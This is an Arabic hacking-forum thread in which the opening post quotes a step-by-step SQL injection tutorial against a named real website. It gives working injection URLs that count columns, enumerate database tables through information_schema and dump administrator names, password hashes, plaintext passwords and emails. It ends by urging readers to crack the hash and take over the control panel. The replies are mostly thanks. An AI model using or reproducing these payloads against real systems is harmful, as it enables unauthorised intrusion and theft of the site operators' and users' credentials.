التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-08-2013, 05:49 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية omar2
 

 

 
إحصائية العضو







omar2 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
omar2 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


اقتباس
المشاركة الأصلية كتبت بواسطة KaLa$nikoV
عنا موقع مصاب




نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود PHP:
order by 1--
 
order by 5--
 
order by 10--
 
order by 15-- 
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
كود PHP:
order by 1/* 
يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
انتبه للناقص

الان لنعرف اصدار القاعده
نكتب
كود PHP:
 
version
() 
وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه



كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
و

كود PHP:
 
+from+information_schema.columns-- 
فتصبح

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns-- 
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(371129711537
كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده




زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

كود PHP:
 
http
://www.waraxe.us/sql-char-encoder.html 
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو

نوع التشفير هو
كود PHP:
 
  MySql hex
-encoded string 
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

كود PHP:
where+table_name=0x53757276657941646d696e73 
الاستغلال


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73-- 
ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول


السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)


كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm
[php]

نجمعهم بالامر

بصيرو

كود PHP:

concat
(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm
نركبه بالحقنه


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins-- 
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق







استفين ع التاخر هي الدرس بالفيديو .....






v]: jvjdf hgo',hj td prk r,hu] hgfdhkhj SQL Injection hgavp injection avp a;v a;vh sql

   

رد مع اقتباس
قديم 12-04-2013, 01:27 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية alluhaiby
 

 

 
إحصائية العضو






alluhaiby غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alluhaiby is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


جزاك الله خيرا

   

رد مع اقتباس
قديم 12-30-2013, 05:57 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية mojaweb0
 

 

 
إحصائية العضو







mojaweb0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mojaweb0 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


لي المشاهدة

   

رد مع اقتباس
قديم 01-22-2014, 01:41 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






محمد الرويس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد الرويس is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مششششكور

   

رد مع اقتباس
قديم 03-18-2014, 08:44 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو






شوية معرصين غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
شوية معرصين is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


ممتاز

   

رد مع اقتباس
قديم 03-29-2014, 02:24 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية kacem162004
 

 

 
إحصائية العضو






kacem162004 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kacem162004 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكوووووووووور أخي على الشرح

   

رد مع اقتباس
قديم 04-26-2014, 04:11 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Jaza
 

 

 
إحصائية العضو







Jaza غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Jaza is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


فكيت ازممممة

   

رد مع اقتباس
قديم 05-13-2014, 02:58 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






بانوراما الحازمي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
بانوراما الحازمي is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


-


موضوع بطل ، تسلم يمينك اخوي

   

رد مع اقتباس
قديم 05-18-2014, 12:01 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية rmieng
 

 

 
إحصائية العضو






rmieng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
rmieng is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكووووووور والله يعطيك العافية

   

رد مع اقتباس
قديم 05-21-2014, 05:03 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية dr.naw
 

 

 
إحصائية العضو






dr.naw غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dr.naw is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكور

   

رد مع اقتباس
قديم 06-25-2014, 02:20 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية BeginSpy
 

 

 
إحصائية العضو






BeginSpy غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
BeginSpy is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


في ح عنده معلومات عن لغة البرمجة لقواعد البيانات Nosql

   

رد مع اقتباس
قديم 06-26-2014, 04:43 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية /*-+
 

 

 
إحصائية العضو





/*-+ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
/*-+ is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


.

   

رد مع اقتباس
قديم 07-04-2014, 04:22 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية ghost libya
 

 

 
إحصائية العضو







ghost libya غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ghost libya is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكور ع الشرح الوافي

   

رد مع اقتباس
قديم 07-08-2014, 05:02 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية katana5791
 

 

 
إحصائية العضو






katana5791 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
katana5791 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكور أخي على الشرح

   

رد مع اقتباس
قديم 07-28-2014, 03:40 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية MMHackerx
 

 

 
إحصائية العضو







MMHackerx غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MMHackerx is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشاء الله تبارك الرحمن

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
البيانات, الشرح, injection, شرح, شكر, شكرا, sql, sql injection


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات للبلايد سكول KaLa$nikoV SQL قواعد البيانات 40 03-24-2018 11:45 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection-- Master vbspiders SQL قواعد البيانات 26 12-01-2010 03:19 AM


الساعة الآن 11:13 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0